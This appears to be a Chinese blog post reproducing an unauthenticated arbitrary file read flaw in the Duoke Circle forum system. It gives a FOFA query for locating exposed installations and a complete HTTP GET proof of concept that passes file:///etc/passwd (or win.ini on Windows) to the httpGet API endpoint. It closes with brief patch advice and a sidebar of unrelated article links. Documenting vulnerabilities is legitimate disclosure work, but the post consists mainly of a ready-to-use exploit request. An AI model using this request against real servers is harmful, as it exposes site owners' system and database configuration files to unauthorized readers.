多客圈子论坛系统 httpGet 任意文件读取漏洞复现

0x01 产品简介

多客圈子论坛系统是一种面向特定人群或特定话题的社交网络,它提供了用户之间交流、分享、讨论的平台。在这个系统中,用户可以创建、加入不同的圈子,圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、点赞等互动。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。

0x02 漏洞概述

多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:body="/static/index/js/jweixin-1.2.0.js"

0x04 漏洞复现

PoC

GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

PS:Windows读取C:/windows/win.ini

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-06-08 11:08:03       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-06-08 11:08:03       106 阅读
  3. 在Django里面运行非项目文件

    2024-06-08 11:08:03       87 阅读
  4. Python语言-面向对象

    2024-06-08 11:08:03       96 阅读

热门阅读

  1. 树状数组详解

    2024-06-08 11:08:03       26 阅读
  2. git子模块

    2024-06-08 11:08:03       24 阅读
  3. 尝试用 GPT-4o 写 2024高考语文作文

    2024-06-08 11:08:03       21 阅读
  4. 浅谈一下实例化

    2024-06-08 11:08:03       25 阅读
  5. Unreal Engine项目结构与关卡设置详解

    2024-06-08 11:08:03       32 阅读
  6. 介绍建造者模式

    2024-06-08 11:08:03       26 阅读
  7. android studio开发时提示 TLS 握手错误解决办法

    2024-06-08 11:08:03       23 阅读
  8. 中子介程五

    2024-06-08 11:08:03       22 阅读
  9. ThreadLocal怎么拿不到用户信息了?

    2024-06-08 11:08:03       32 阅读
  10. 全屋智能的本质是低成本的重构

    2024-06-08 11:08:03       30 阅读